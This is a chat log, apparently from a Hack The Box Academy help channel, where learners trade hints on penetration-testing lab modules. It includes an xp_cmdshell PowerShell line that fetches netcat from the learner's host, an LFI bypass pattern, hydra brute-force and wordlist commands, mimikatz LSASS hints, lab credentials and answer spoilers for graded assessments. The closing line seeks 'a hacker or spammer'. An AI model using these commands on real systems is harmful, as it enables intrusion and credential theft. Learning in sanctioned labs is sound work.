Sign up for academy, and learn. Its free to begin
You practice in academy
they teach you the tools, what they are used for, how they are used
getting started (service scanning) apparently this is a pain in the ass for everyone or most ppl
shares
The cyber mentor has some really good stuff on youtube as well
Can someone explain why my VPN doesn't work. It has worked in the past but not anymore, + I don't find any solutions in the FAQ or anywhere else
did you uninstall kali or update it?
can anyone help me on the skill assessment of Windows PE ?
the error shows that you're missing the cipher you have set
you might check your openvpn config files and make sure you have the right ciphers installed
@glad solar what password were you trying?
In this case i have a new kali but what I meant is that it worked in the past on my vm
bob:Welcome1
trying to find user SID in powershell. I am using correct CMnd getting nothing
im a noob...need some help
strange, I got right in
ill keep trying
oh i see it
can you ping the host?
I dont know if assigning the username before or after matters. I guess try and see
can someone help me with information gathering-web edition
sure thing.
active subdomain enumeration I am betting
you should gamble more haha
nope same thing is happening
you do bob:Welcome1
correct?
yes sir
then wtf is happening
dm me and I will do a screen share
Can anyone help me with the last chapter/module on windows fundamentals?
Anyone available to give me a nudge with File Upload Attacks - Skill Assessment? I am able to read the source code and found where and how the files are uploaded but need a nudge on understanding MIME type or if I am using the correct MIME type
Funny my company just got hit badly on their exchange servers
Upload an allowed file and intercept the request with Burp. Then adjust the data.
Otherwise the magic byte won't work...
hi, can someone help me with broken authentication skills assessment?
i having difficulty with bruteforcing the admin account password
i think mainly its my wordlist, but i wasnt sure if i am filter it right. the following is the command i use to filter it
egrep '^.{20,30}$' rockyou.txt| grep '^[[:upper:]]'| grep '[[:digit:]]$'| grep '[]$#@{]'
you weren't supposed to brute force the password for the admin user, do it with the ||support|| user and ||decode his cookie||
ah ok, shall try bruting the support account now
oh wait i just use the magic number and it's working fine for me what additional do you need to change?
@vital adder btw, is my command to filter the wordlist correct? i am kinda skeptical about it
after your filter the rockyou wordlist you should have ||50|| or under password
hold up 😂
how much did you have after your filter command?
19
I had trouble writing the Magic Bytes correctly. So I simply uploaded an allowed file and then adjusted the data accordingly.
oh then that's better
Cheers
nah, all invalid credentials
I downloaded an image, edited it with mousepad and deleted everything then pasted in the magic byte and command
ohhh and btw you only need 4-5 step (with a hex editor) to add the magic number correctly to your payload
shoot me a dm i'll help you with that
someone gave me a nudge, giving it a shot right now
nice try that and if you still have issue feel free to dm me
will do~ thanks
Having Troubles exploiting host 2 in the Shells and Payloads Live Engagement section. Would anyone have time to bounce some things off?
sure what's the issue?
When I find the exploit and try to get it into metasploit the number increases so its in there but when I search for it, it does not find it.
in metasploit after you import an exploit you need to run something like reload_all for metasploit to find it
after you run that try search the exploit number or if you change the name to something else search for that name
Is there an easy way to fix the split error that you get
what split error?
what options did you set in metasploit
also if you set the targeturl and the vhost to the ip that's the issue
yep you need to set the target url and the vhost to blog domain
that was it as soon as i set the url in the vhost. thank you for your help
Can someone help me with setting up the VPN?
download the file then start it with sudo openvpn Downloads/academy.ovpn &
Tried that, doesn't work
screen shot the error
what do you see when you ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp1s0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 52:54:00:f3:e9:3a brd ff:ff:ff:ff:ff:ff
inet 192.168.122.238/24 brd 192.168.122.255 scope global dynamic noprefixroute enp1s0
valid_lft 2423sec preferred_lft 2423sec
inet6 fe80::1e80:af70:bbd4:105a/64 scope link noprefixroute
valid_lft forever preferred_lft forever
And with VPN enabled:
└──╼ $ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp1s0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 52:54:00:f3:e9:3a brd ff:ff:ff:ff:ff:ff
inet 192.168.122.238/24 brd 192.168.122.255 scope global dynamic noprefixroute enp1s0
valid_lft 2364sec preferred_lft 2364sec
inet6 fe80::1e80:af70:bbd4:105a/64 scope link noprefixroute
valid_lft forever preferred_lft forever
4: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 10.10.15.186/23 scope global tun0
valid_lft forever preferred_lft forever
inet6 dead:beef:2::11b8/64 scope global
valid_lft forever preferred_lft forever
inet6 fe80::a14e:6ada:e2cb:e0d6/64 scope link stable-privacy
valid_lft forever preferred_lft forever
ok so vpn is connected. lets see you ssh command
(xxx.xxx is the rest of the IP)
Here's the result:
└──╼ $ssh htb-student@10.129.xxx.xxx
Connection closed by 10.129.xxx.xxx port 22
are you sure ssh is open ? what module are you working on?
It says "SSH to xxx with user [...]"
can you ping the target ip?
ehhh the command goes on and on
└──╼ $ping 10.129.29.112
PING 10.129.29.112 (10.129.29.112) 56(84) bytes of data.
64 bytes from 10.129.29.112: icmp_seq=1 ttl=63 time=29.4 ms
64 bytes from 10.129.29.112: icmp_seq=2 ttl=63 time=30.9 ms
64 bytes from 10.129.29.112: icmp_seq=3 ttl=63 time=28.7 ms
64 bytes from 10.129.29.112: icmp_seq=4 ttl=63 time=31.6 ms
64 bytes from 10.129.29.112: icmp_seq=5 ttl=63 time=28.9 ms
64 bytes from 10.129.29.112: icmp_seq=6 ttl=63 time=32.2 ms
64 bytes from 10.129.29.112: icmp_seq=7 ttl=63 time=30.5 ms
64 bytes from 10.129.29.112: icmp_seq=8 ttl=63 time=31.4 ms
64 bytes from 10.129.29.112: icmp_seq=9 ttl=63 time=28.2 ms
64 bytes from 10.129.29.112: icmp_seq=10 ttl=63 time=29.3 ms
64 bytes from 10.129.29.112: icmp_seq=11 ttl=63 time=28.9 ms
64 bytes from 10.129.29.112: icmp_seq=12 ttl=63 time=30.8 ms
64 bytes from 10.129.29.112: icmp_seq=13 ttl=63 time=35.3 ms
64 bytes from 10.129.29.112: icmp_seq=14 ttl=63 time=35.9 ms
64 bytes from 10.129.29.112: icmp_seq=15 ttl=63 time=29.6 ms
64 bytes from 10.129.29.112: icmp_seq=16 ttl=63 time=29.5 ms
64 bytes from 10.129.29.112: icmp_seq=17 ttl=63 time=32.9 ms
64 bytes from 10.129.29.112: icmp_seq=18 ttl=63 time=29.0 ms
64 bytes from 10.129.29.112: icmp_seq=19 ttl=63 time=29.3 ms
this is not the whole output
thats fine it wont end till you end it
oh okay lol xD
--- 10.129.29.112 ping statistics ---
143 packets transmitted, 143 received, 0% packet loss, time 142201ms
rtt min/avg/max/mdev = 27.540/31.563/88.248/5.243 ms
ok so ssh htb-student@10.129.29.112 works for me
i dont see why, I use vpn from my VM
i was wondering for fuzzing web applications, how come that ffuf shows a file with a 200 status but when i try to get it via cat it returns html?
did it return the status for a web page? or a txt file?
its returning the same webpage
its this module https://academy.hackthebox.com/module/23/section/1494
I would say maybe your command is not quite right
oh ok
feel free to dm and we can work on it
May I ask what VPN service you're using?
sorry, I misunderstood. I dont use a vpn service. I just connect to academy using vpn.
ahh okay I'll later try to disable it
So I disabled my VPN and tried connecting to the target and here's the output:
└──╼ $ssh htb-student@10.129.29.112
ssh: connect to host 10.129.29.112 port 22: No route to host
@half cave but you can ping 10.129.29.112?
how do i write this payload to a .svg file
i would use nano but vim or pico will also work. Or any text editor
actually not 😮
PING 10.129.29.112 (10.129.29.112) 56(84) bytes of data.
From 10.10.14.1 icmp_seq=1 Destination Host Unreachable
From 10.10.14.1 icmp_seq=2 Destination Host Unreachable
From 10.10.14.1 icmp_seq=3 Destination Host Unreachable
From 10.10.14.1 icmp_seq=4 Destination Host Unreachable
From 10.10.14.1 icmp_seq=5 Destination Host Unreachable
im properly stuck on Broken Authentication assessment, can anyone give me a push pls?
Okay I finally got it to work, I had to disable my host VPN
i can try
good job.
you can dm if still need help
damn skills assessment on password attacks is brutal
Hello, I am in the Getting Started module and in the Nibbles-Privilege Escalation section I get to the point of executing the monitor.sh file, but it is requiring me to input the nibbles user password when it says it shouldn't. Is there something I am overlooking?
Doesn't seem to be any forum discussions on it, so it has to be something I don't intuitively know after completing the rest of the module.
once logged in as nibbles you should be able to sudo the file without a password
Ok, I don't know what changed. I reset the target machine 3 times and did the same thing. Only thing that changed was the IP of the target machine on my final attempt and it worked. Just gonna let that one go.
can anyone tell me if I am using the right wordlist for password attacks easy lab
For the Easy Lab you can use the list provided in the module
the basic list or the mut list?
Basic
ive been running the username.list provided against the mut list and found nothing yet
Hello,
I am having a bit of trouble with the Advanced File Disclosure section of the Web Attacks Module. Could someone assist me?
|| I feel like I should be editing the xxe.dtd file but I'm not quite sure how to...||
i can try
ok, want to do it in Dms?
if u don't want to spoil
kk
Hi, so im doing the linux fundementals module rn, and im wondering, is it normal that i dont understand 80% of the things that is being explained?
what do u mean ?
ya, I tend to struggle a lot with grasping it initially, but then I just read about it more online at various sources and then reread/redo course/exercises.
Like im completely new to this, 0 cyber sec background, never touched upon linux before. And the module is just a bunch of words i dont rlly get.
Okay i see, i'll just finish the module, and if i dont understand something ill just look it up
yeah if u are beginning it may be a bit strange/scary but ur gonna get used to it
take notes
and by using the commands again and again ur gonna find it easy to do
Okay will do
Also is it fine if i follow the course without having linux installed?
I read abt vms and stuff so i want to have linux on there if possible
I use VMware fusion with Parrot Sec on my main os, and it runs great. Virtual Box is an option too. Both are ran as VMs.
So to get it straight, you wont be installing linux on ur own pc right?
I have done a dual boot in the past on a PC with Kali Linux and Windows, and I ended up breaking something in the BIOS settings and completely fudged it all up/haven't gotten it to work since (thank goodness it was a crap computer haha). (dual boot is like not installing it on a VM but actually partitioning part of the computer for it) But to answer your question: correct, it just installs the OS image onto a VM that you can easily turn on/delete/etc... Here are ParrotSec's instructions on installing it onto Oracle Virtual Box: https://www.parrotsec.org/docs/install-parrot-on-virtualbox.html
Ahh okay thank you, yeah i dont wanna mess up my pc lol
virtual box/vmware won't hurt, just dual boot stay away from.
hi! im doing the using web proxies course and there is a part where you need to fuzz for an md5 encrypted cookie. Can someone point me in the right way because i can't seem to figure it out :/
" The directory we found above sets the cookie to the md5 hash of the username, as we can see the md5 cookie in the request for the (guest) user. Visit '/skills/' to get a request with a cookie, then try to use ZAP Fuzzer to fuzz the cookie for different md5 hashed usernames to get the flag. Use the "top-usernames-shortlist.txt" wordlist from Seclists."
FINALLY https://imgur.com/ND6Scvw.png
this is the longest i've done so far
the module that took the most time.
congrats!
Nice! How long did it take you?
Not bad! What do you think was taking the most time for you? I'm slowly going through modules, but it feels like an eternity. Constantly taking screenshots, writing notes, etc.
i had stuff to do irl too but still, it's a long time.
well the only reason i did that active directory module like that is because i was trying to do the notes taking one
and it's like, take over the domain n finish the report
Ah, gotcha. I'm a long way from getting to that one. Sounds interesting.
i dont really keep notes until the past 3 or 4 modules
and it's just a text file that looks like this but uglier because it's just text and no cool formatting like the forum post
that forum post is practice making them more concise (5 easy steps to solve it the way i approached and modeled it)
but had to do tunnel and pivot module too in order to write that, which is not what everyone else is doing on the forum thread.
if i did not take notes it would be uglier than that or not exist at all, idk.
Is anyone available to answer a quick question for me about using ZAP in the Web Proxies module?
Gg
@west canopy you awake?
hey
On password attacks easy lab, I have gotten ssh access, but I cant find the path to get the root password. Lazagne errors out, I cant install anything, cant sudo, there is no mozilla, give me a hint bro..
@lethal atlas try checking ||bash history :)||
haha, I'm on this one right now. None of the techniques are working
@radiant dagger ready to have your mind blown?
all ears 😁
hi guys, i'm stuck on the footprinting module Section IMAP: Question: Try to access the emails on the IMAP server and submit the flag as the answer. (Format: HTB{...})
i tried openssl and curl to fetch the email but nothing works, any hint?
Is that the right access data for user and pwd?
yes
Just going over the Linux Priv Esc Module - Special Permissions but I can't get the answer correct - I believe my searches work fine and provide the answer. Any help appreciated 🙂
guys if i login on hack the box webiste
webiste
website*
i would get kali linux gui to practice right
or i have to install it sperately
seperately
@knotty crag hackthebox uses Parrot os not kali but you can use kali if you install it separately
what tool is this
Could you get in?
I assume you mean curl
ok its curl
From man: DESCRIPTION
curl is a tool for transferring data from or to a server. It supports these protocols: DICT, FILE, FTP,
FTPS, GOPHER, GOPHERS, HTTP, HTTPS, IMAP, IMAPS, LDAP, LDAPS, MQTT, POP3, POP3S, RTMP, RTMPS, RTSP, SCP,
SFTP, SMB, SMBS, SMTP, SMTPS, TELNET or TFTP. The command is designed to work without user interaction.
curl offers a busload of useful tricks like proxy support, user authentication, FTP upload, HTTP post, SSL
connections, cookies, file transfer resume and more. As you will see below, the number of features will make
your head spin.
i have a doubt
as i dont actually have a good pc
i just wanted to know that is it necessary to have a 8gb ram to run my workstation on hack the box
as it provides a lab
and a workstation
You can use a machine with 8Gb and a VM will run fine on 4GB. If you use the pwnbox then the processing is done at server level and you just work it through the browser
hi, i am stuck in Broken Authentication - Predictable Reset Token module at question 1, as far as I know token is generated by hash of username and time then hash md5, I tried converting datetime to epoch time but still getting the wrong token
recommend 8gb because of the processing some different techniques require, fuzzing/webscanning
I think the issue he has maybe an older machine (unlikely to be linux) and as a starter for ten, he could at least do some training. Obviously 8 to 12 Gb for a VM is a nice to have that not always available.
you are right, btw have you completed the htb academy module called using web proxies?
if yes, can u send me a pm
Introduction to Bash Scripting/Conditional Execution
I feel like there is a whole bunch of information I'm supposed to be taught in this section prior to the question of "Create an "If-Else" condition in the "For"-Loop of the "Exercise Script" that prints you the number of characters of the 35th generated value of the variable "var". Submit the number as the answer.", as I have no idea where to begin, or what I'm looking at! Has anyone else gotten stuck here, and know what is going on, or what they are asking?
I'm afraid not - not touched that one yet.
aight np, its a hard module when you are starting out
anyone around to help me with active subdomain enumeration. this module is so desperately requiring a re-write update
OMG I had looked there, even made a note of that line but never tried it as the answer. My head is not in it lately.
hey guys im stuck on "Firewall and IDS/IPS Evasion - Hard Lab can anyone help me please? thanks
Could I get a mod or someone to take a look at the target instance for the "SeImpersonate and SeAssignPrimaryToken" section in the Windows Priv Esc module?
I've been unable to rdp into the target session with the credential provided: Authenticate to 10.129.43.43 with user "sql_dev" and password "Str0ng_P@ssw0rd!"
I've tried both "Str0ng_P@ssw0rd!" and "StrOng_P@sswOrd!", but the connection still fails
Able to connect to a different target instance like normal
I can try
Thanks I’ve had some help. Decided to skip today. Long day in work and I wanna relax 😂
I have a question regards AD Skills Assessment Part II.
I got the xp_cmdshell access on database, now, the problem is downloading file to that machine, the current directory where i am C:\Windows\system32 does not have permissions to do anything, and i can't navigate or move from it to another dir. I tried with powershell downloading to specific folder, but that does not work either.
SQL> xp_cmdshell powershell.exe (New-Object Net.Webclient).Downloadfile('http://172.16.7.240:3333/nc64.exe', 'C:\Temp2\nc64.exe')
[-] ERROR(SQL01\SQLEXPRESS): Line 1: Incorrect syntax near '/'.
Any help is appreciated
Im stuck on footprinting-imap/pop3 I tried to use this email as the admin email but it says it's wrong... any hints?
@errant lava your command seems overly complicated.. simplify it up.
try openssl s_client -connect 10.129.123.78:imaps
I did that command and the same email shows up.
guys
i wanna ask for help
Local file inclusion section basic bypasses
i tried every combination to bypass filters
still getting illegal path specified
need help
strange, I get something totally different
actually, no I got the same thing, that is just the first step
you then have to login
fetch the email and get the answer
ahh okay, I'll try that
Login with telnet?
i can get etc/passwd but am unable to get the flag what am i missing
what module is this?
assessment file upload
you need RCE for this the flag isn't named flag.txt
so find the upload path and all that s***
try ||....//|| and add more until you get the flag but if you add more than 15 that's too much and something is wrong
before that, still did not get to that
is there a way to use a find command to also list how many it found?
the manual is really big and im still looking for it with little success, thought rates could be used but dont know how to
Hmmmmmm
and also get RCE
@vital adder thanks
i will give it try
after the find command add | wc -l also you can google thing like this
sure it has worked greatly
ok it still not working
the question: The above web application employs more than one filter to avoid LFI exploitation. Try to bypass these filters to read /flag.txt
i used ....// and encoding
still no use
i used a lot of ....//
I'm stuck on footprinting-imap/pop3 still... I have tried connecting with telnet but I don't know the username and password. It is asking me to submit the admin email and the only email that shows up when I do openssl s_client -connect 10.129.14.128:imaps is not the one I need
dm me if you still need help with that
the credentials are shown just above the questions section
(robin:robin)
Yeah I saw that. I guess it doesn't work with telnet tho
I'm logged in now just trying to figure the commands out
i found the upload path and the source code but having trouble understanding how the files are renamed
here https://www.w3schools.com/php/phptryit.asp?filename=tryphp_date1 but use the date value in the source to fuzz around and learn how date in php works
I am currently at the File Transfer module and I am stuck at the 2nd question where I need to upload a .zip file to the target machine. Do I need to provide a server on the target machine or my pwnbox? It's probably from my pwnbox, but I can't reach the pwnbox from the target machine, although I am using the VPN. Can anyone help?
you can't use the vpn and the pwnbox at the same time
@vital adder Sorry I meant with pwnbox my own computer and on them I use the VPN
the htb openvpn? if you use that at the same time with pwnbox they are going to try to kick each other off
I am using academy.ovpn
yes don't use that with the pwnbox
just use the pwnbox or just use your vpn
I am not using the pwnbox in the web UI. I only using the open vpn file.
so is your pwnbox running?
No
oh then you're just having issue with module and pwnbox isn't involved for this just setup a ||python http server|| and on the target machine use ||wget||
Alright
once logged in with openssl all your commands have to be preceded by a random character. I used 1. i.e 1 login robin robin
I figured it out 🙂 thank you much. didn't realize what openssl was actually doing at first. I was able to Fetch the email
@vital adder Is this the right command to download a file ? Invoke-WebRequest http://<target IP>/upload_win.zip -OutFile upload_win.zip. Anyway I have some problems connecting to my computer where I configured the python web server.
You need host the python web server on your computer if you want to upload file onto the target machine
Yes that's what I did, but if I try to access the file I want to upload to the target machine with the command I mention earlier, I get the error message, that I can't connect to my computer where I host the python web server.
For the network services portion of the Password Attack module. Is the username list and the password list the one I should use to get the RDP username and password?
yes
K I was using and hydra keeps stopping saying something about too many errors. just wanted to make sure I was on the right track.
it took me 3 times of having to restart to get it to work.
Should the command from the course work?
yes, I used hydra -U username.list -P password.list rdp://10.129.xxx.xxx then after it timed out use hydra -R to restart it.
O I got ya restart the command not the server. I'll give that a try.
Can anyone give me a nudge on what to do in Password Attacks Medium Lab after I get the login for J? I have ssh'ed into the machine and looked around but don't see anything useful. Do I need to try and view the database files found in pulse?
Hi All, I'm in the OSINT: Corporate Recon module. I have answers for all the questions besides the "Locations". Has anyone done it already and can give me a hint?
hint ||the mysql database|| not database files found in pulse
i swear I tried mysql from the get go and got an error it wasn't installed.
but logged in with J so I guess I was high lol
Anybody able to help me in DM with the last step of the Getting Started module Knowledge Check so I don't blow up this chat? I am able to get to the point of starting the reverse shell with escalated privileges, but I can't execute any commands in it
dm me if you still need help with that
I need help at Pivoting, Tunneling, and Port Forwarding module, in the Skills Assessment. I got the second target and the IP I need to pivot now, but I can't find any credentials, nor reuse the ones used before
the module isn't about finding creds (they didn't teach anything about that), so I don't think I need to search for it
is someone a hacker in fortnite would play with one
oh wait sorry i misread your question it's 3 am for me and i'm finishing up some stuff before sleep I thought you were asking something about the privesc module and did you answer the previous question from that
haha don't worry, if you could help me
sure did you find the username for question 5
if you do it right with ||mimikatz|| then the password should be at the bottom of the output
lol, but they didn't even tell you about that
did you read the hint for question 5
I checked the file but didn't find anything special
research about ||LSASS dump|| and this is why you need ||mimikatz||
thanks mate :)
On the Shells & Payloads - Skills assessment: Attempting to get a reverse shell on Host 1. Deployed payload, shown as running, but failing to get the connection on listener. Feel like I am overlooking something? Any help is appreciated 🙂
would this be the right place to ask for help with an error I'm getting on a starting point module?
starting point in HTB or getting started in HTB academy? either way feel free to DM 🙂
you can use this bash one-liner to see how the date works.
php -r "echo(date('ymd'));"
I already finished the module but thanks anyways
Windows Privilege Escalation the connection is completely broken. Couldn't connect either through VPN or attack instance
the issue has been remediated
anyone else having issues with the server for Nibbles? Getting to a point of logging to the admin panel, and just locking up/not loading
I have been working on this module https://academy.hackthebox.com/module/144 and it looks like it is out of date. I have go installed but when I try and use the two go modules I get XXXXXXXX not found
Heya guys. I am having a little bit of trouble in the Medium lab in Network Enumeration With Nmap Module. I am not sure if the answer is right in front of me or not to find out what is the DNS server version of the target. Feel free to DM me.
have you used the right switches?
Maybe...I don't know I am quite a noob here. I did a scan with -sV -sC and -p- which gave a lot of interesting information.
I was assuming that maybe the DNS server version would be something like Apache/2.4.18
But maybe I have been detected by IDS so I am not sure
I'm not sure exactly what I am missing since above it seems to show the version Apache 2 is being used. But I might have to use an alternate scan to avoid the firewall
https://academy.hackthebox.com/module/19/section/118 This is the section that I am stuck on.
In which section?
Apache is a web server, not a DNS server.
Look again exactly which protocol DNS uses as default and on which port it runs.
To get the name you need NSE
What list did you use for ActiveDirectory skill assignment 2 question 4? Tried several lists from SecList nothing is working. Could use a nudge
Thanks, do you mind if I DM you if I come up with any issues?
No problem, feel free to send me a DM
Awesome
Both in the passive and active sections there are certain GO modules that are installed. I think I might have a problem with the bashrc file. I will check that out first
@acoustic owl can I dm you pls?
I hope that i could see this earlier. Found it after I solved it 😅
sure
me help
hi can someone help me?
You have to brute force the Time with a range of +/- 60 secs
you have to take the time you generate the token, then go +- 1000 ms and fuzz the answer
thanks @hollow quest @lethal atlas let me try
Hi, I'm having problems with the module "attacking common services" there is no ftp service running on the target machine. I've reset the target three times and looks like didn't change much. I'm using -p- as argument for nmap. Anyone having the same problem?
Are you on the " Attacking FTP" section?
Correct
have you used -sV and -sC?
yes
this is a known bug that happened many times before and the port also isn't open for me
To clear any doubts this is the command I'm using: "sudo nmap -vv -n -sVC -p- <target_ip_address> -oA ftp"
I see that's why
Hey there everyone. Is there someone here with Python/docker/aws experience for developing? I have some questions I want to ask
I am absolutely stuck on password attacks medium lab
did you get the cred for d user?
Hi, a zone in the DNS protocol, and more particularly on Bind9, is a config file that contains all your DNS records. You can have one or more zones on your DNS server. A zone is characterized by a SOA (a zone can only have 1 SOA). So here, the goal is to identify which domain names (that you already found) respond to a SOA DNS query 😉
yes, and cracked the passphrase for id_rsa
hint ||that ssh key isn't for the d user||
but it works for him? cause I used it to log in.
oh wait it also works for him, try with someone else
LOL i just did. I did not know that would work for more than one person. That is crazy
I have been stuck there since yesterday
yeah i don't know that part either
onto the hard lab!! thanks @vital adder
sure if you need help with that feel free to dm me if you're stuck
Hi!!
In the last question of DNS footprint regarding the host ending with 203 I’m trying every subdomain found with different wordlists
Can anyone help pls?
Trying different options but can’t manage to hit the pot
My command is:
||dnsenum --dnsserver HTB_ip --enum -p 0 -s 0 -o subdomain.txt -f <seclists_wordlist> inlanefreight.htb||
Why do you want to bruteforce the main domain? It allows a zone transfer. It gives you all the data voluntarily
@fierce pewter I really appreciate you taking the time to break that down for me it made it so much more clear!
Could I get some help with the password mutations section of the password attacks module. I have tried cutting the mutated password list down but that still didn't seem to get it to brute force it using hydra.
cut the first ||17000|| password
O I used the last 17000 but I will try that.
Hello
someone could help me to connect htb to my vm
htb academy machine
''2022-08-11 12:27:16 Initialization Sequence Completed''
after that what should i do
you're connected. open another console and type ip a
Am I using the first 17000 or getting rid of them
rid of them
yea sure
I got it last night finally, but thanks!
Hi, I'm stuck on "Information Gathering - Web Edition" module at the "Information Gathering - Web - Skills Assessment", question 3: "Perform active infrastructure identification against the host https://i.imgur.com. What server name is returned for the host?". I don't really understand the question, I don't know what I am supposed to find. I checked the DNS records, the header of the page, etc. Can anyone help me?
try whatweb
Thanks for your response, I've already used whatweb but I visibly missed something. I'll check better, thanks.
Yep
Do you mind that I pm you @vale salmon ?
Not at all
Try using a different wordlist. I had a hard time with this one. All the DNS wordlists are in your || seclist/Discovery/|| directory
I need a hacker or spammer to work with...